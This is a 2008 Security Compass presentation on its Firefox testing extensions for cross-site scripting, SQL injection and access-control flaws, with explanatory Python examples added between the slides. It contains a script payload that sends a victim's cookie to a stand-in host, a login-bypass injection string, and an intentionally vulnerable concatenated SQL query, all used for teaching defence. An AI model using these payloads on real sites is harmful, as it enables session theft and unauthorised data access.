© 2008 Security Compass inc.

Page 1: Firefox Plug-ins for Application Penetration Testing
Exploit-Me

Page 2: Who are we?
• Tom Aratyn
  – Software Developer at Security Compass
  – Developed the Exploit-Me tools

Page 3: Who are we?
• Jamie
  – Security Consultant for Security Compass
  – Background in security research, penetration testing, and software development

Page 4: Agenda
• Cross-site scripting: really a danger?
• State of web application security
• XSS-Me
• SQL Inject-Me
• Access Me

Page 5: XSS – Really a Danger?
• We know XSS can be dangerous, but can we use it to rob a bank?
  – AJAX + CSRF + XSS = major problem

Page 6: Two Exciting Flavours
• Reflected
  – Spat back as soon as it goes in
  – XSS-Me helps here
• Stored
  – Saved for someone else
  – XSS-Me future version

Page 7: What is this XSS Stuff?
• Un-validated user input executed by the user's computer
• JavaScript is typically used
  – PDF files are XSS-able
• Someone took my cookie
<SCRIPT>location.href="http://10.1.1.1/cgi-bin/steal.cgi?"+escape(document.cookie);</SCRIPT>

Page 8: Someone Changed my App
• AJAX is adding a new element into these attacks
  – AJAX was used in the IBDBank attack
• Attacker can play with data as if the victim is doing it
  – Send
  – Receive
  – Parse

Page 9: State of Web App Insecurity
• Web app exploits outnumber buffer overflows in CVE
• Large portion of web apps suffer from XSS or SQL Injection

Page 10: Testing Tools
• Various tools exist
  – OWASP tools, commercial, open source
• Work very well
  – For what they were built to do

Page 11: The Missing Piece
• Most tools are not built for developers or QA
• Developers and QA must be checking for security vulnerabilities
• Need lightweight tools

Page 12: XSS-Me 0.4 to the Rescue
• Firefox extension to test for cross-site scripting

Page 13: XSS-Me Features
• Pick forms & fields to test
• Firefox 3
• Import/export/add/remove XSS strings
• Test & Surf
• Heuristics to limit tests

Page 14: Heuristics?
• Checking all attacks against all fields is slow.
  – No, trust me, it's slow
• Heuristic tests limit the fields we have to check by determining if we can inject into them
  – Passes a set of characters and checks if they're returned (;\/<>='")
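The reflection heuristic the slide describes, written out as an added Python example (this is not code from the slides or from the XSS-Me extension): a probe value made of a marker plus the slide's character set is submitted in a field, and the response is scanned right after the marker to see which of those characters came back unencoded. The marker `xssme`, the entity forms accepted as "encoded", and the sample responses are constructed for this example.

```python
import html
from typing import Optional

# Character set the slide's heuristic probe sends: ;\/<>='"
PROBE_CHARS = ";\\/<>='\""
MARKER = "xssme"  # constructed: lets us find the echoed value in the response


def build_probe(marker: str = MARKER) -> str:
    """Value to submit in a form field: marker followed by the probe characters."""
    return marker + PROBE_CHARS


def reflected_unencoded(body: str, marker: str = MARKER) -> Optional[str]:
    """Walk the response just after the marker and report which probe characters
    came back verbatim. Returns None if the marker is not reflected at all.
    HTML-entity-encoded characters (&lt; &gt; &quot; &#x27; &#39; ...) count as
    safely encoded and are skipped; any other transformation stops the scan."""
    start = body.find(marker)
    if start < 0:
        return None
    pos = start + len(marker)
    raw = []
    for ch in PROBE_CHARS:
        if body.startswith(ch, pos):  # came back as-is
            raw.append(ch)
            pos += 1
            continue
        # accept the usual entity forms as evidence of output encoding
        for enc in (html.escape(ch, quote=True), "&#%d;" % ord(ch), "&#x%x;" % ord(ch)):
            if enc != ch and body.startswith(enc, pos):
                pos += len(enc)
                break
        else:
            break  # character was dropped or altered: stop comparing
    return "".join(raw)


def worth_testing(body: str, marker: str = MARKER) -> bool:
    """Heuristic decision: only run the full attack-string set against a field
    if at least one character that matters for script injection (< > ' ")
    is echoed unencoded."""
    raw = reflected_unencoded(body, marker)
    return raw is not None and any(c in raw for c in "<>'\"")


if __name__ == "__main__":
    probe = build_probe()
    # constructed sample responses for one search field
    samples = {
        "raw": "<p>You searched for: %s</p>" % probe,
        "encoded": "<p>You searched for: %s</p>" % html.escape(probe, quote=True),
        "none": "<p>No results</p>",
    }
    for name, body in samples.items():
        print(name, repr(reflected_unencoded(body)), worth_testing(body))
```

A field whose response encodes `<`, `>`, `'` and `"` (the "encoded" sample) is skipped even though `;`, `\`, `/` and `=` come back raw, which is the saving the slide is after: the expensive attack-string run only happens where script-relevant characters survive.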

Page 15: Behind the Magic
• Attempts to set document.vulnerable=true in the DOM
• If the property is set, the attack worked
• Also checks for the plain-text string, a potential vulnerability
  – OnMouseOver injection

Page 16: Thank $deity for Struts
• Everyone says use Struts to protect yourself
  – Sure, just don't follow the supplied examples

Page 17: Being Bobby
sql = "SELECT * FROM users WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"
User input:
username = jimmy
password = blah' OR '1'='1
Resulting query:
SELECT * FROM users WHERE username = 'jimmy' AND password = 'blah' OR '1'='1'
Since the appended '1'='1' is true for every record, the entire table is returned!
Courtesy XKCD.com

Page 18: No Excuse
• Defence is well known and faster than what you're doing now
  – Prepared statements
  – Stored procedures
• OK, if you use exec in your procedure this is also vulnerable, but you're not doing that, right?
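The "Being Bobby" query and its prepared-statement fix side by side, as an added Python example (not code from the slides): the same `jimmy` / `blah' OR '1'='1` input is run through the slide's concatenated query and through a parameterised one against a constructed in-memory SQLite table. The table contents and the driver (`sqlite3`) are assumptions for the example; the point is identical for any database API that supports bound parameters.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("jimmy", "s3cret"), ("alice", "hunter2")])
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The slide's pattern: query text built by string concatenation.
    User input becomes part of the SQL grammar, so a quote in the value
    changes the WHERE clause (vulnerable; kept here to show the failure)."""
    sql = ("SELECT * FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_prepared(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Prepared statement: the SQL text is fixed and the values are bound
    separately, so a quote in the input is just data, never syntax."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    user, pwd = "jimmy", "blah' OR '1'='1"   # the slide's input
    print("concatenated:", login_concat(db, user, pwd))   # every row comes back
    print("prepared:    ", login_prepared(db, user, pwd))  # no rows: the password is wrong
```

The concatenated version returns both rows because the WHERE clause now ends in `OR '1'='1'`; the prepared version returns nothing, because the bound value `blah' OR '1'='1` is compared literally against the password column. The slide's caveat applies unchanged: a stored procedure that rebuilds a statement from its arguments with `exec` has simply moved the concatenation into the database.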

Page 19: SQL Inject-Me 0.4
• Firefox extension to check for SQL injection

Page 20: SQL Inject-Me Features
• Pick what you test
• Configure attack and success strings
• Large default string set
• Firefox 3
• Test & Surf

Page 21: What's your method?
• Web/application servers may be vulnerable to HTTP verb tampering attacks
• Bypasses common authorization configurations
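Why a verb-scoped authorization rule can be bypassed, as an added Python model (not code from the slides or from Access Me): a constructed constraint modelled on a servlet-style security constraint that lists only GET and POST is evaluated beside the same constraint with no method list, and a small check reports which verbs reach the protected path without any role. The path, roles and verb list are assumptions for the example.

```python
# Constructed constraints, modelled on a servlet security-constraint that names
# only GET and POST in its http-method list. Any other verb is not covered.
WEAK = [{"prefix": "/admin/", "methods": {"GET", "POST"}, "roles": {"admin"}}]

# Same constraint with no method list: it applies to every verb.
HARDENED = [{"prefix": "/admin/", "methods": None, "roles": {"admin"}}]

COMMON_VERBS = ("GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE")


def is_allowed(constraints: list, method: str, path: str, roles: set) -> bool:
    """Evaluate the first constraint that covers this path and verb.
    A request that no constraint covers is unrestricted, which is exactly
    how a verb-scoped rule lets unlisted verbs through."""
    for c in constraints:
        if not path.startswith(c["prefix"]):
            continue
        if c["methods"] is not None and method.upper() not in c["methods"]:
            continue  # verb not listed: this constraint does not apply
        return bool(roles & c["roles"])
    return True


def verbs_reaching_anonymously(constraints: list, path: str, verbs=COMMON_VERBS) -> list:
    """What an Access Me style verb check reports for a path: the verbs that
    reach it with no role at all. An empty list is the desired outcome."""
    return [v for v in verbs if is_allowed(constraints, v, path, set())]


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, verbs_reaching_anonymously(cfg, "/admin/users"))
```

The weak configuration lets HEAD, PUT, DELETE, OPTIONS and TRACE through anonymously; HEAD is the one that matters most, since most servers answer it with the GET handler and only drop the body. The fix is the hardened form: apply the constraint to every verb (in the servlet model, omit the method list entirely) and separately reject verbs the application never uses.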

Page 22: Access Me 0.2
• Firefox extension to check for authentication issues

Page 23: Access Me Features
• Checks for unauthenticated access vulnerabilities
• Checks for HTTP verb vulnerabilities
• Regular-expression-based parameter detection
• Automatic test as you surf

Page 24: Detecting Access Vulnerabilities
• Failed if response status is 200 and response too similar
• Warning if response status is 200 or response too similar
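The two rules on this slide as an added Python example (not code from the slides or from Access Me): the authenticated response is replayed without the session, and the replayed status and body are scored against the original. The similarity measure (`difflib` ratio), the 0.9 threshold and the sample page bodies are assumptions for the example; the slide does not say how Access Me measures "too similar".

```python
import difflib


def similarity(a: str, b: str) -> float:
    """0.0 (nothing in common) to 1.0 (identical); difflib ratio is the assumed measure."""
    return difflib.SequenceMatcher(None, a, b).ratio()


def classify_access_test(test_status: int, test_body: str,
                         auth_body: str, threshold: float = 0.9) -> str:
    """Apply the slide's rules to an unauthenticated (or verb-swapped) replay:
    'failed'  : status 200 AND body too similar to the authenticated one
    'warning' : status 200 OR body too similar (one signal only)
    'passed'  : neither"""
    too_similar = similarity(auth_body, test_body) >= threshold
    is_200 = test_status == 200
    if is_200 and too_similar:
        return "failed"
    if is_200 or too_similar:
        return "warning"
    return "passed"


# Constructed sample bodies: the page seen with a valid session, and a login page.
AUTH_BODY = ('<html><body><h1>Account summary</h1><p>Balance: 1234.56</p>'
             '<a href="/logout">Logout</a></body></html>')
LOGIN_BODY = ('<html><body><h1>Please log in</h1><form action="/login">'
              '<input name="user"><input name="pass"></form></body></html>')


if __name__ == "__main__":
    # constructed replay outcomes: (status, body) returned without the session cookie
    replays = {
        "redirect to login": (302, ""),
        "same page served":  (200, AUTH_BODY),
        "login page":        (200, LOGIN_BODY),
        "403 but same body": (403, AUTH_BODY.replace("1234.56", "0.00")),
    }
    for name, (status, body) in replays.items():
        print("%-20s %s" % (name, classify_access_test(status, body, AUTH_BODY)))
```

The "login page" case is why the 200-alone rule is only a warning: many applications answer an unauthenticated request with a 200 and a login form, which is fine. The "403 but same body" case is the opposite warning, a denial status wrapped around content that should not have been rendered at all; both deserve a human look, and only the combination is an automatic fail.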

Page 25: Where can you get 'em
• Available from our website
  – www.securitycompass.com
• Extra XSS-Me attack strings also available from the site
• Open sourced under GPL v3

Page 26: The Future...
• May include
  – Spidering
• Stored attacks